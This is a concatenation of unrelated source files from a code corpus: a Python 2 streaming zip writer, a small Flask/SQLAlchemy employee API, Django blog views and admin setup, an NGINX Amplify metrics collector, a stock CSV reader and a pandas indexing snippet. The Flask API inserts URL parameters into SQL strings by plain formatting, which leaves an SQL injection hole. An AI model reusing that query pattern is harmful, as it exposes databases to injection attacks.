zlib = None
crc32 = binascii.crc32
__all__ = ["BadZipfile", "error", "ZIP_STORED", "ZIP_DEFLATED", "is_zipfile",
"ZipInfo", "ZipFile", "PyZipFile", "LargeZipFile" ]
class BadZipfile(Exception):
pass
class LargeZipFile(Exception):
pass
class TooManyFiles(Exception):
pass
error = BadZipfile # The exception raised by this module
ZIP64_LIMIT = (1 << 31) - 1
ZIP_FILECOUNT_LIMIT = 1 << 16
ZIP_MAX_COMMENT = (1 << 16) - 1
# constants for Zip file compression methods
ZIP_STORED = 0
ZIP_DEFLATED = 8
# Other ZIP compression methods not supported
# Below are some formats and associated data for reading/writing headers using
# the struct module. The names and structures of headers/records are those used
# in the PKWARE description of the ZIP file format:
# http://www.pkware.com/documents/casestudies/APPNOTE.TXT
# (URL valid as of January 2008)
# The "end of central directory" structure, magic number, size, and indices
# (section V.I in the format document)
structEndArchive = "<4s4H2LH"
stringEndArchive = "PK\005\006"
sizeEndCentDir = struct.calcsize(structEndArchive)
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
# These last two indices are not part of the structure as defined in the
# spec, but they are used internally by this module as a convenience
_ECD_COMMENT = 8
_ECD_LOCATION = 9
# The "central directory" structure, magic number, size, and indices
# of entries in the structure (section V.F in the format document)
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = "PK\001\002"
sizeCentralDir = struct.calcsize(structCentralDir)
# indexes of entries in the central directory structure
_CD_SIGNATURE = 0
_CD_CREATE_VERSION = 1
_CD_CREATE_SYSTEM = 2
_CD_EXTRACT_VERSION = 3
_CD_EXTRACT_SYSTEM = 4
_CD_FLAG_BITS = 5
_CD_COMPRESS_TYPE = 6
_CD_TIME = 7
_CD_DATE = 8
_CD_CRC = 9
_CD_COMPRESSED_SIZE = 10
_CD_UNCOMPRESSED_SIZE = 11
_CD_FILENAME_LENGTH = 12
_CD_EXTRA_FIELD_LENGTH = 13
_CD_COMMENT_LENGTH = 14
_CD_DISK_NUMBER_START = 15
_CD_INTERNAL_FILE_ATTRIBUTES = 16
_CD_EXTERNAL_FILE_ATTRIBUTES = 17
_CD_LOCAL_HEADER_OFFSET = 18
# The "local file header" structure, magic number, size, and indices
# (section V.A in the format document)
structFileHeader = "<4s2B4HL2L2H"
stringFileHeader = "PK\003\004"
sizeFileHeader = struct.calcsize(structFileHeader)
_FH_SIGNATURE = 0
_FH_EXTRACT_VERSION = 1
_FH_EXTRACT_SYSTEM = 2
_FH_GENERAL_PURPOSE_FLAG_BITS = 3
_FH_COMPRESSION_METHOD = 4
_FH_LAST_MOD_TIME = 5
_FH_LAST_MOD_DATE = 6
_FH_CRC = 7
_FH_COMPRESSED_SIZE = 8
_FH_UNCOMPRESSED_SIZE = 9
_FH_FILENAME_LENGTH = 10
_FH_EXTRA_FIELD_LENGTH = 11
# The "Zip64 end of central directory locator" structure, magic number, and size
structEndArchive64Locator = "<4sLQL"
stringEndArchive64Locator = "PK\x06\x07"
sizeEndCentDir64Locator = struct.calcsize(structEndArchive64Locator)
# The "Zip64 end of central directory" record, magic number, size, and indices
# (section V.G in the format document)
structEndArchive64 = "<4sQ2H2L4Q"
stringEndArchive64 = "PK\x06\x06"
sizeEndCentDir64 = struct.calcsize(structEndArchive64)
_CD64_SIGNATURE = 0
_CD64_DIRECTORY_RECSIZE = 1
_CD64_CREATE_VERSION = 2
_CD64_EXTRACT_VERSION = 3
_CD64_DISK_NUMBER = 4
_CD64_DISK_NUMBER_START = 5
_CD64_NUMBER_ENTRIES_THIS_DISK = 6
_CD64_NUMBER_ENTRIES_TOTAL = 7
_CD64_DIRECTORY_SIZE = 8
_CD64_OFFSET_START_CENTDIR = 9
def _check_zipfile(fp):
try:
if _EndRecData(fp):
return True # file has correct magic number
except IOError:
pass
return False
def is_zipfile(filename):
"""Quickly see if a file is a ZIP file by checking the magic number.
The filename argument may be a file or file-like object too.
"""
result = False
try:
if hasattr(filename, "read"):
result = _check_zipfile(fp=filename)
else:
with open(filename, "rb") as fp:
result = _check_zipfile(fp)
except IOError:
pass
return result
def _EndRecData64(fpin, offset, endrec):
"""
Read the ZIP64 end-of-archive records and use that to update endrec
"""
try:
fpin.seek(offset - sizeEndCentDir64Locator, 2)
except IOError:
# If the seek fails, the file is not large enough to contain a ZIP64
# end-of-archive record, so just return the end record we were given.
return endrec
data = fpin.read(sizeEndCentDir64Locator)
sig, diskno, reloff, disks = struct.unpack(structEndArchive64Locator, data)
if sig != stringEndArchive64Locator:
return endrec
if diskno != 0 or disks != 1:
raise BadZipfile("zipfiles that span multiple disks are not supported")
# Assume no 'zip64 extensible data'
fpin.seek(offset - sizeEndCentDir64Locator - sizeEndCentDir64, 2)
data = fpin.read(sizeEndCentDir64)
sig, sz, create_version, read_version, disk_num, disk_dir, \
dircount, dircount2, dirsize, diroffset = \
struct.unpack(structEndArchive64, data)
if sig != stringEndArchive64:
return endrec
# Update the original endrec using data from the ZIP64 record
endrec[_ECD_SIGNATURE] = sig
endrec[_ECD_DISK_NUMBER] = disk_num
endrec[_ECD_DISK_START] = disk_dir
endrec[_ECD_ENTRIES_THIS_DISK] = dircount
endrec[_ECD_ENTRIES_TOTAL] = dircount2
endrec[_ECD_SIZE] = dirsize
endrec[_ECD_OFFSET] = diroffset
return endrec
def _EndRecData(fpin):
"""Return data from the "End of Central Directory" record, or None.
The data is a list of the nine items in the ZIP "End of central dir"
record followed by a tenth item, the file seek offset of this record."""
# Determine file size
fpin.seek(0, 2)
filesize = fpin.tell()
# Check to see if this is ZIP file with no archive comment (the
# "end of central directory" structure should be the last item in the
# file if this is the case).
try:
fpin.seek(-sizeEndCentDir, 2)
except IOError:
return None
data = fpin.read()
if data[0:4] == stringEndArchive and data[-2:] == "\000\000":
# the signature is correct and there's no comment, unpack structure
endrec = struct.unpack(structEndArchive, data)
endrec=list(endrec)
# Append a blank comment and record start offset
endrec.append("")
endrec.append(filesize - sizeEndCentDir)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, -sizeEndCentDir, endrec)
# Either this is not a ZIP file, or it is a ZIP file with an archive
# comment. Search the end of the file for the "end of central directory"
# record signature. The comment is the last item in the ZIP file and may be
# up to 64K long. It is assumed that the "end of central directory" magic
# number does not appear in the comment.
maxCommentStart = max(filesize - (1 << 16) - sizeEndCentDir, 0)
fpin.seek(maxCommentStart, 0)
data = fpin.read()
start = data.rfind(stringEndArchive)
if start >= 0:
# found the magic number; attempt to unpack and interpret
recData = data[start:start+sizeEndCentDir]
endrec = list(struct.unpack(structEndArchive, recData))
commentSize = endrec[_ECD_COMMENT_SIZE] #as claimed by the zip file
comment = data[start+sizeEndCentDir:start+sizeEndCentDir+commentSize]
endrec.append(comment)
endrec.append(maxCommentStart + start)
# Try to read the "Zip64 end of central directory" structure
return _EndRecData64(fpin, maxCommentStart + start - filesize,
endrec)
# Unable to find a valid end of central directory structure
return
class ZipInfo (object):
"""Class with attributes describing each file in the ZIP archive."""
__slots__ = (
'orig_filename',
'filename',
'date_time',
'compress_type',
'comment',
'extra',
'create_system',
'create_version',
'extract_version',
'reserved',
'flag_bits',
'volume',
'internal_attr',
'external_attr',
'header_offset',
'CRC',
'compress_size',
'file_size',
'_raw_time',
'encoding',
)
def __init__(self, filename="NoName", encoding = 'utf-8', date_time=(1980,1,1,0,0,0)):
self.orig_filename = filename # Original file name in archive
# Terminate the file name at the first null byte. Null bytes in file
# names are used as tricks by viruses in archives.
null_byte = filename.find(chr(0))
if null_byte >= 0:
filename = filename[0:null_byte]
# This is used to ensure paths in generated ZIP files always use
# forward slashes as the directory separator, as required by the
# ZIP format specification.
if os.sep != "/" and os.sep in filename:
filename = filename.replace(os.sep, "/")
self.encoding = encoding
self.filename = filename # Normalized file name
self.date_time = date_time # year, month, day, hour, min, sec
if date_time[0] < 1980:
raise ValueError('ZIP does not support timestamps before 1980')
# Standard values:
self.compress_type = ZIP_STORED # Type of compression for the file
self.comment = "" # Comment for each file
self.extra = "" # ZIP extra data
if sys.platform == 'win32':
self.create_system = 0 # System which created ZIP archive
else:
# Assume everything else is unix-y
self.create_system = 3 # System which created ZIP archive
self.create_version = 20 # Version which created ZIP archive
self.extract_version = 20 # Version needed to extract archive
self.reserved = 0 # Must be zero
self.flag_bits = 0 # ZIP flag bits
self.volume = 0 # Volume number of file header
self.internal_attr = 0 # Internal attributes
self.external_attr = 0 # External file attributes
# Other attributes are set by class ZipFile:
# header_offset Byte offset to the file header
# CRC CRC-32 of the uncompressed file
# compress_size Size of the compressed file
# file_size Size of the uncompressed file
def FileHeader(self):
"""Return the per-file header as a string."""
dt = self.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
if self.flag_bits & 0x08:
# Set these to zero because we write them after the file data
CRC = compress_size = file_size = 0
else:
CRC = self.CRC
compress_size = self.compress_size
file_size = self.file_size
extra = self.extra
if file_size > ZIP64_LIMIT or compress_size > ZIP64_LIMIT:
raise LargeZipFile("Filesize would require ZIP64 extensions")
filename, flag_bits = self._encodeFilenameFlags()
header = struct.pack(structFileHeader, stringFileHeader,
self.extract_version, self.reserved, flag_bits,
self.compress_type, dostime, dosdate, CRC,
compress_size, file_size,
len(filename), len(extra))
return header + filename + extra
def _encodeFilenameFlags(self):
if isinstance(self.filename, unicode):
try:
return self.filename.encode(self.encoding), self.flag_bits
except UnicodeEncodeError:
return self.filename.encode('utf-8'), self.flag_bits | 0x800
else:
end = chardet.detect(self.filename)['encoding']
self.filename = self.filename.decode(end).encode(self.encoding)
return self.filename, self.flag_bits
def _decodeFilename(self):
if self.flag_bits & 0x800:
return self.filename.decode('utf-8')
else:
return self.filename
def _decodeExtra(self):
# Try to decode the extra field.
extra = self.extra
unpack = struct.unpack
while extra:
tp, ln = unpack('<HH', extra[:4])
if tp == 1:
if ln >= 24:
counts = unpack('<QQQ', extra[4:28])
elif ln == 16:
counts = unpack('<QQ', extra[4:20])
elif ln == 8:
counts = unpack('<Q', extra[4:12])
elif ln == 0:
counts = ()
else:
raise RuntimeError, "Corrupt extra field %s"%(ln,)
idx = 0
# ZIP64 extension (large files and/or large archives)
if self.file_size in (0xffffffffffffffffL, 0xffffffffL):
self.file_size = counts[idx]
idx += 1
if self.compress_size == 0xFFFFFFFFL:
self.compress_size = counts[idx]
idx += 1
if self.header_offset == 0xffffffffL:
old = self.header_offset
self.header_offset = counts[idx]
idx+=1
extra = extra[ln+4:]
class ZipFile:
""" Class with methods to open, read, write, close, list zip files.
z = ZipFile(file, mode="r", compression=ZIP_STORED, allowZip64=False)
file: Either the path to the file, or a file-like object.
If it is a path, the file will be opened and closed by ZipFile.
mode: The mode can be either read "r", write "w" or append "a".
compression: ZIP_STORED (no compression) or ZIP_DEFLATED (requires zlib).
allowZip64: if True ZipFile will create files with ZIP64 extensions when
needed, otherwise it will raise an exception when this would
be necessary.
"""
fp = None # Set here since __del__ checks it
def __init__(self, encoding = 'utf-8', mode="r", compression=ZIP_STORED, allowZip64=False):
"""Open the ZIP file with mode read "r", write "w" or append "a"."""
if mode not in ("r", "w", "a"):
raise RuntimeError('ZipFile() requires mode "r", "w", or "a"')
if compression == ZIP_STORED:
pass
elif compression == ZIP_DEFLATED:
if not zlib:
raise RuntimeError,\
"Compression requires the (missing) zlib module"
else:
raise RuntimeError, "That compression method is not supported"
self._allowZip64 = allowZip64
self._didModify = False
self.debug = 0 # Level of printing: 0 through 3
self.NameToInfo = {} # Find file info given name
self.filelist = [] # List of ZipInfo instances for archive
self.compression = compression # Method of compression
self.mode = key = mode.replace('b', '')[0]
self.pwd = None
self.comment = ''
self.pos = 0
self.encoding = encoding
# Check if we were passed a file-like object
if key == 'r':
pass
elif key == 'w':
# set the modified flag so central directory gets written
# even if no files are added to the archive
self._didModify = True
elif key == 'a':
pass
else:
raise RuntimeError, 'Mode must be "r", "w" or "a"'
def _writecheck(self, zinfo):
"""Check for errors before writing a file to the archive."""
if zinfo.filename in self.NameToInfo:
if self.debug: # Warning for duplicate names
print "Duplicate name:", zinfo.filename
if self.mode not in ("w", "a"):
raise RuntimeError, 'write() requires mode "w" or "a"'
if zinfo.compress_type == ZIP_DEFLATED and not zlib:
raise RuntimeError, \
"Compression requires the (missing) zlib module"
if zinfo.compress_type not in (ZIP_STORED, ZIP_DEFLATED):
raise RuntimeError, \
"That compression method is not supported"
if zinfo.file_size > ZIP64_LIMIT:
raise LargeZipFile
if zinfo.header_offset > ZIP64_LIMIT:
raise LargeZipFile
def calc_size(self, size_list):
size = (sizeFileHeader + 12 + sizeCentralDir) * len(size_list)
for k,v in size_list:
size = size + int(k) + 2*len(v)
return size + sizeEndCentDir
def write(self, iterator, size, mtime, arcname=None, compress_type=None):
mtime = mtime
date_time = mtime[0:6]
zinfo = ZipInfo(arcname, self.encoding, date_time)
if compress_type is None:
zinfo.compress_type = self.compression
else:
zinfo.compress_type = compress_type
zinfo.file_size = size
zinfo.flag_bits = 0x08
zinfo.header_offset = self.pos # Start of header bytes
try:
self._writecheck(zinfo)
except:
raise
self._didModify = True
zinfo.external_attr = (0777 & 0xFFFF) << 16L
zinfo.CRC = CRC = 0
zinfo.compress_size = compress_size = 0
zinfo.file_size = file_size = 0
try:
compress_trunk = zinfo.FileHeader()
except:
raise LargeZipFile
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
for trunk in iterator:
file_size = file_size + len(trunk)
CRC = crc32(trunk, CRC) & 0xffffffff
compress_trunk = trunk
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
zinfo.compress_size = file_size
zinfo.CRC = CRC
zinfo.file_size = file_size
compress_trunk = struct.pack("<LLL", zinfo.CRC, zinfo.compress_size,
zinfo.file_size)
self.pos = self.pos + len(compress_trunk)
yield compress_trunk
self.filelist.append(zinfo)
self.NameToInfo[zinfo.filename] = zinfo
def close(self):
trunk = ''
size_d = 0
if self.mode in ("w", "a") and self._didModify: # write ending records
count = 0
for zinfo in self.filelist: # write central directory
count = count + 1
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
extra = []
file_size = zinfo.file_size
compress_size = zinfo.compress_size
header_offset = zinfo.header_offset
extra_data = zinfo.extra
extract_version = zinfo.extract_version
create_version = zinfo.create_version
try:
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
except DeprecationWarning:
print >>sys.stderr, (structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
zinfo.flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(zinfo.filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
trunk = centdir + filename + extra_data + zinfo.comment
size_d = size_d + len(trunk)
yield trunk
# Write end-of-zip-archive record
centDirCount = count
centDirSize = size_d
centDirOffset = self.pos
if (centDirCount >= ZIP_FILECOUNT_LIMIT or
centDirOffset > ZIP64_LIMIT or
centDirSize > ZIP64_LIMIT):
raise TooManyFiles
endrec = struct.pack(structEndArchive, stringEndArchive,
0, 0, centDirCount, centDirCount,
centDirSize, centDirOffset, len(self.comment))
trunk = endrec + self.comment
yield trunk
def calc(source, archive):
pos = 0
count = 0
pos_s = 0
size_d = []
for file_item in source:
it, file_size, file_path, mtime = file_item
mtime = time.localtime(mtime)
item = (file_size, file_path)
size_d.append(item)
size_c = archive.calc_size(size_d)
return size_c
def calc_size(source, archive):
size_c = archive.calc_size(source)
return size_c
def file_wss(source, archive):
try:
pos = 0
count = 0
pos_s = 0
for file_item in source:
it, file_size, file_path, mtime = file_item
mtime = time.localtime(mtime)
iterator = archive.write(it, file_size, mtime, file_path)
for i in iterator:
yield i
except:
#raise LargeZipFile
raise
try:
iterator = archive.close()
for i in iterator:
yield i
except :
raise TooManyFiles
def get_zip_size(source, encode):
archive = ZipFile(encode, 'w')
size = calc_size(source, archive)
archive.close()
return size
def get_zip(source, encode):
archive = ZipFile(encode, 'w')
it = file_wss(source, archive)
archive.close()
return it
def get_zip_it(source, encode):
archive = ZipFile(encode, 'w')
size = calc(source, archive)
it = file_wss(source, archive)
archive.close()
return size, it
if __name__ == "__main__":
main()
| [
"ggjjlldd@gmail.com"
] | ggjjlldd@gmail.com |
10c36922bc03425a1fe36d97c99ee638a1715209 | 651dd30ada6088fc075e93ffd1c5eb019a2e26ad | /setup.py | 43f99b860d29e0b70d171dc7684ab4d945b2a319 | [] | no_license | ashish-hacker/exAPI | d840b0b4da8173eca8121c0a8890cca8915491b6 | 10a18160fe652c10063c8bcda26bcb0f59aa0df3 | refs/heads/main | 2023-02-15T14:09:58.988459 | 2020-12-30T05:27:31 | 2020-12-30T05:27:31 | 325,461,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,739 | py | from flask import Flask, request
from flask_restful import Resource, Api
from sqlalchemy import create_engine
from json import dumps
from flask_jsonpify import jsonify
db_connect = create_engine('sqlite:///chinook.db')
app = Flask(__name__)
api = Api(app)
class Employees(Resource):
def get(self):
conn = db_connect.connect() # connect to database
query = conn.execute("select * from employees") # This line performs query and returns json result
return {'employees': [i[0] for i in query.cursor.fetchall()]} # Fetches first column that is Employee ID
class Tracks(Resource):
def get(self):
conn = db_connect.connect()
query = conn.execute("select trackid, name, composer, unitprice from tracks;")
result = {'data': [dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
class Employees_Name(Resource):
def get(self, employee_id):
conn = db_connect.connect()
query = conn.execute("select * from employees where EmployeeId =%d " %int(employee_id))
result = {'data': [dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
class Getname(Resource):
def get(self, name):
conn = db_connect.connect()
query = conn.execute("select * from employees where FirstName = %s"%(name))
result = {'data':[dict(zip(tuple (query.keys()) ,i)) for i in query.cursor]}
return jsonify(result)
api.add_resource(Employees, '/employees') # Route_1
api.add_resource(Tracks, '/tracks') # Route_2
api.add_resource(Employees_Name, '/employees/<employee_id>') # Route_3
api.add_resource(Getname, '/name/<name>')
if __name__ == '__main__':
app.run(port='5002') | [
"akpanigrahy26@gmail.com"
] | akpanigrahy26@gmail.com |
bd06d2423fa88052243f341f9de42c0b6771158e | e6cee476fe265ebcd3f83d519db3fd01368e14cd | /article/views.py | 7f67517d0395f624c57c399115d9ece9bd814b16 | [] | no_license | edward-yin/blog-project | c96bca8c62141bcfef9dc4d3d500d5f8dcd23ce4 | 55503b060cb808ee0c5c676d53e60ed895712ec9 | refs/heads/master | 2021-01-21T14:23:55.300770 | 2017-07-13T02:58:11 | 2017-07-13T02:58:11 | 95,274,067 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | from django.shortcuts import render
from django.http import HttpResponse
from article.models import Article
from datetime import datetime
from django.http import Http404
# Create your views here
def home(request):
post_list = Article.objects.all() #获取全部的Article对象
return render(request, 'home.html', {'post_list' : post_list})
def detail(request,arti_id):
try:
post = Article.objects.get(id=str(arti_id))
except Article.DoesNotExist:
raise Http404
return render(request,'post.html',{'post':post})
| [
"edward.yinxp@gmail.com"
] | edward.yinxp@gmail.com |
e00d864ccd59cb04d2832d0d8da60884622e3044 | b2de5660d81afdf6b1fba058faee6ece6a51e462 | /amplify/agent/collectors/plus/upstream.py | ebd305b92eb648c9fd3ca9fc2b1bc0b84eb905e5 | [
"BSD-2-Clause"
] | permissive | Ferrisbane/nginx-amplify-agent | 725d8a7da7fb66e0b41cddd8139d25a084570592 | ef769934341374d4b6ede5fcf5ebff34f6cba8de | refs/heads/master | 2021-01-22T00:03:49.686169 | 2016-07-20T17:50:30 | 2016-07-20T17:50:30 | 63,801,713 | 0 | 0 | null | 2016-07-20T17:41:25 | 2016-07-20T17:41:25 | null | UTF-8 | Python | false | false | 3,982 | py | # -*- coding: utf-8 -*-
from amplify.agent.collectors.plus.util import upstream
from amplify.agent.common.context import context
from amplify.agent.collectors.plus.abstract import PlusStatusCollector
__author__ = "Grant Hulegaard"
__copyright__ = "Copyright (C) Nginx, Inc. All rights reserved."
__credits__ = ["Mike Belov", "Andrei Belov", "Ivan Poluyanov", "Oleg Mamontov", "Andrew Alexeev", "Grant Hulegaard", "Arie van Luttikhuizen"]
__license__ = ""
__maintainer__ = "Grant Hulegaard"
__email__ = "grant.hulegaard@nginx.com"
class UpstreamCollector(PlusStatusCollector):
short_name = 'plus_upstream'
def collect(self):
try:
tuples = self.gather_data()
for data, stamp in tuples:
# workaround for supporting old N+ format
# http://nginx.org/en/docs/http/ngx_http_status_module.html#compatibility
peers = data['peers'] if 'peers' in data else data
for peer in peers:
# This loop will aggregate all peer metrics as a single "upstream" entity.
for method in (
self.active_connections,
self.upstream_request,
self.upstream_header_time,
self.upstream_response_time,
self.upstream_responses,
self.upstream_bytes,
self.upstream_fails,
self.upstream_health_checks,
self.upstream_queue,
self.upstream_peer_count
):
try:
method(peer, stamp)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream peer metrics %s due to %s' %
(method.__name__, exception_name)
)
context.log.debug('additional info:', exc_info=True)
try:
self.increment_counters()
self.finalize_latest()
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to increment n+ upstream counters due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
except Exception as e:
exception_name = e.__class__.__name__
context.log.error(
'failed to collect n+ upstream metrics due to %s' %
exception_name
)
context.log.debug('additional info:', exc_info=True)
def active_connections(self, data, stamp):
upstream.collect_active_connections(self, data, stamp)
def upstream_request(self, data, stamp):
upstream.collect_upstream_request(self, data, stamp)
def upstream_header_time(self, data, stamp):
upstream.collect_upstream_header_time(self, data, stamp)
def upstream_response_time(self, data, stamp):
upstream.collect_upstream_response_time(self, data, stamp)
def upstream_responses(self, data, stamp):
upstream.collect_upstream_responses(self, data, stamp)
def upstream_bytes(self, data, stamp):
upstream.collect_upstream_bytes(self, data, stamp)
def upstream_fails(self, data, stamp):
upstream.collect_upstream_fails(self, data, stamp)
def upstream_health_checks(self, data, stamp):
upstream.collect_upstream_health_checks(self, data, stamp)
def upstream_queue(self, data, stamp):
upstream.collect_upstream_queue(self, data, stamp)
def upstream_peer_count(self, data, stamp):
upstream.collect_upstream_peer_count(self, data, stamp)
| [
"dedm@nginx.com"
] | dedm@nginx.com |
cb8a68f1457ae35fdff34a854bc29bb7e59f0116 | be2efdf72140c50134725ba227016a7727e7c447 | /blog/admin.py | 0da353e28dca24c3f8d1ddff146f7a1ca00c82fe | [] | no_license | slTrust/django_blog | 936e6a55f2d46971a7bdeadb1b83f378cf1fc424 | 509c45ce0fc66b47487ccefdcaa8312593d0c832 | refs/heads/master | 2020-04-07T17:19:16.592269 | 2018-11-21T14:34:50 | 2018-11-21T14:34:50 | 158,564,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | from django.contrib import admin
# Register your models here.
# admin的使用方式:
'''
在这里进行注册 就可以在后台页面进行数据录入
'''
from blog import models
admin.site.register(models.UserInfo)
admin.site.register(models.Blog)
admin.site.register(models.Category)
admin.site.register(models.Tag)
admin.site.register(models.Article)
admin.site.register(models.ArticleUpDown)
admin.site.register(models.Article2Tag)
admin.site.register(models.Comment) | [
"trustfor@sina.cn"
] | trustfor@sina.cn |
9b7e9d3d90de74e4bc9953761ad5776d63bdc1db | 99b998a790f8ef3186ca65c63c34434a46fd5a54 | /admin_view/views/menu.py | f8b8a485cc971f5e68ce105a104b4c4268273913 | [] | no_license | jhavive/restaurant_management_server | 2d12eaefc45b4aa530fb55298f8538dfb69a9e8c | 9025a938581e8a45189a5d5429bfd2a33c378edf | refs/heads/master | 2023-05-29T17:19:43.728748 | 2021-06-07T06:22:21 | 2021-06-07T06:22:21 | 374,556,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,101 | py | from rest_framework import viewsets
import json
from rest_framework.response import Response
from admin_view.models import Menu, Section, Items
class MenuViewSet(viewsets.ViewSet):
# def list(self, request):
def list(self, request, pk=None):
try:
menu = {}
sections = []
response = []
try:
menu = Menu.objects.get(hotel=request.user.organization)
sections = Section.objects.filter(menu=menu)
except Exception as e:
print(e)
for section in sections:
section_items = []
items = Items.objects.filter(section=section)
for item in items:
section_items.append({
"id" : item.pk,
"item_name" : item.name,
"description" : item.description,
"price" : item.price,
# "non_veg" : item.non_veg,
"tags" : item.tags,
})
response.append({
"section_name" : section.name,
"items" : section_items
})
return Response(response)
except Exception as e:
print(e)
return Response({
"message": "Somerror occured"
}, status=500)
def create(self, request):
try:
req = json.loads(request.body)
hotel = request.user.organization
menu = Menu.objects.get_or_create(hotel=hotel)
menu = Menu.objects.get(hotel=hotel)
sections = Section.objects.filter(menu=menu).delete()
items = Items.objects.filter(menu=menu).delete()
print(req)
for section in req.get('sections'):
new_section = Section(name=section.get('section_name'), menu=menu)
new_section.save()
for item in section.get('items'):
new_item = Items(
name = item.get('item_name'),
description = item.get('description'),
price = item.get('price'),
menu = menu,
section = new_section,
hotel = hotel
)
new_item.save()
return Response({
"message": "Successfully Created A new Menu",
"status": True
})
except Exception as e:
print(e)
return Response({
"message": 'Some Error Occured',
"status": False
}, status=400)
| [
"jhavive@gmail.com"
] | jhavive@gmail.com |
1e9c528018bf38cf093d4fc468adb1347d55c350 | 88ab730d575f63d5fb7b2479089ae4da0a76d13c | /src/kmeans_nw.py | d427e3b1a15b88ef8a7b8c17f751484ecfa8f76e | [] | no_license | ecnumjc/newwords | a4d04946333f85990e035dcd81e25ee0380f9bd0 | ca62f11c0f7e2051df1232845a6de733e5bac89c | refs/heads/master | 2021-01-10T12:26:58.591180 | 2016-04-18T10:43:12 | 2016-04-18T10:43:12 | 55,706,576 | 1 | 0 | null | null | null | null | GB18030 | Python | false | false | 542 | py | # -*- coding: utf-8 -*-
from sklearn.cluster import KMeans
from sklearn.externals import joblib
import pca
if __name__ == '__main__':
feature,word = pca.loadDataSet('fund.txt')
lowDMat,reconMat = pca.pca(feature,1)
print lowDMat
fout = open('result.txt','w')
#调用kmeans类
clf = KMeans(n_clusters=2)
s = clf.fit(lowDMat)
#print s
#中心
#print clf.cluster_centers_
#每个样本所属的簇
for i in range(len(clf.labels_)):
fout.write(word[i][0]+'\t'+str(clf.labels_[i])+'\n') | [
"593074398@qq.com"
] | 593074398@qq.com |
0efd5a531ecc344c1ecfdd46256d4a409f0fc4d2 | 17bb9da0ca060565ae171eedd0050892b990a48e | /grs/sell_buy_immediately.py | 435e09d407c80336cdb92eeaead9b3b39346bf19 | [] | no_license | showliu/Stock_Bot | b17d5291a698ddc6126336056f8ae20669e1e769 | 6bd01761db1e52cb67d70f8d0226e1b8394a2863 | refs/heads/master | 2020-03-28T16:59:13.606740 | 2018-04-12T13:09:33 | 2018-04-12T13:09:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,190 | py | # -*- coding: utf-8 -*-
"""
功能:抓取個股殖利率程式
網址: http://www.twse.com.tw/ch/trading/exchange/BWIBBU/BWIBBU_d.php
前置作業:需要把csv檔中頭尾相關中文標題先刪除
"""
import csv
def stock_buy_sell_oneday():
'''
回傳dict:[股票名稱, 本益比, 殖利率(%), 股價淨值比]
回傳dict:[台泥utf8, '14.93', '5.69', '1.37']
EX: a['1101'] = [u'\u53f0\u6ce5', '14.93', '5.69', '1.37']
'''
buy_sell_oneday_dict = {}
f = open('TWTB4U_20150424.csv','r')
for row in csv.reader(f):
try:
buy_sell_oneday_dict[row[0].strip()]=[row[1].decode('Big5').strip(),row[2].strip()]
except:
pass
f.close()
return buy_sell_oneday_dict
if __name__ == "__main__":
a = stock_buy_sell_oneday()
print a['9921'][0]
print a['9921'][1] #回傳Y表示暫停現股賣出後現款買進當沖註記
"""
twse_yields = {}
f = open('TWTB4U_20150424.csv','r')
for row in csv.reader(f):
print row
try:
twse_yields[row[0].strip()]=[row[1].decode('Big5').strip(),row[2].strip()]
print type(row[0])
print '123'
except:
pass
f.close()
"""
| [
"hautinboy@yahoo.com.tw"
] | hautinboy@yahoo.com.tw |
52a17c8116ab095f3b0fc1dda5c8b59d0b5e1a86 | af7e80cfe1a8b2f02bac8b5a8e7ab863d662827b | /DataAnalysis/pandass/MultiIndexing/Slice.py | f2d4e60683887eb5ef2796705d45fcdce321456c | [] | no_license | ankiyang/Scripts.Fundamental.Little | 39d19eab13439209353e95df7a28573c80e95797 | 5f03652cad65aa93b2dbb528d5ddbfd889461c25 | refs/heads/master | 2023-01-09T20:14:40.033510 | 2020-11-15T04:20:42 | 2020-11-15T04:20:42 | 60,675,838 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,013 | py | #!/usr/bin/python3.5
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import itertools
"""Slicing a multi-index with xs
http://stackoverflow.com/questions/12590131/how-to-slice-multindex-columns-in-pandas-dataframes
"""
coords = [('AA','one'),('AA','six'),('BB','one'),('BB','two'),('BB','six')]
index = pd.MultiIndex.from_tuples(coords)
df = pd.DataFrame([11,22,33,44,55], index=index, columns=['MyData'])
print(df)
# MyData
# AA one 11
# six 22
# BB one 33
# two 44
# six 55
#To take the cross section of the 1st level and 1st axis the index:
B_df = df.xs("BB", level=0,axis=0)
print(B_df)
# MyData
# one 33
